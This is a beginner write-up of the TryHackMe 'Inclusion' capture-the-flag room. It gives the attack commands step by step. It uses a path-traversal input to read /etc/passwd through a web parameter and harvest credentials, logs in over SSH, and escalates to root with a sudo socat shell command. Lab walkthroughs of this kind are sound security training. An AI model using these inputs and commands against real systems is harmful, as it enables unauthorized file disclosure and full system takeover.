LFI Inclusion-TryHackMe

This is a write-up for LFI Inclusion room from TryHackMe which is a beginner level LFI challenge: - https://tryhackme.com/room/inclusion
Our task is simple: Deploy the machine and find LFI parameters and get the user and root flag.
First check what all services are running on the machine using:
nmap -sC -sV 10.10.41.78
So we have SSH and a Web Server running. Lets check the website first.
On the website after doing basic browsing we found the following links:
  • http://10.10.41.78/article?name=hacking
  • http://10.10.41.78/article?name=lfiattack
  • http://10.10.41.78/article?name=rfiattack
We have a parameter "name" and this can be used to do LFI.
Lets try the following and see if we get anything:
http://10.10.41.78/article?name=../../../../../etc/passwd
and sure enough we get credentials for a user:
Lets login to the box with SSH using these credentials:
ssh falconfeast@10.10.41.78
We got our user flag in the home directory of user falconfeast.
Now lets see if we can run something as sudo using:
sudo -l
Yes we can run socat as root and without password. Great lets do some Privilege Escalation.
Go to https://gtfobins.github.io/ and search for "socat". We found:
Lets try this to see if we can get a root shell using what we found:
sudo socat stdin exec:/bin/sh
We got our root flag also. Submit both the flags :)


Comments

Popular Posts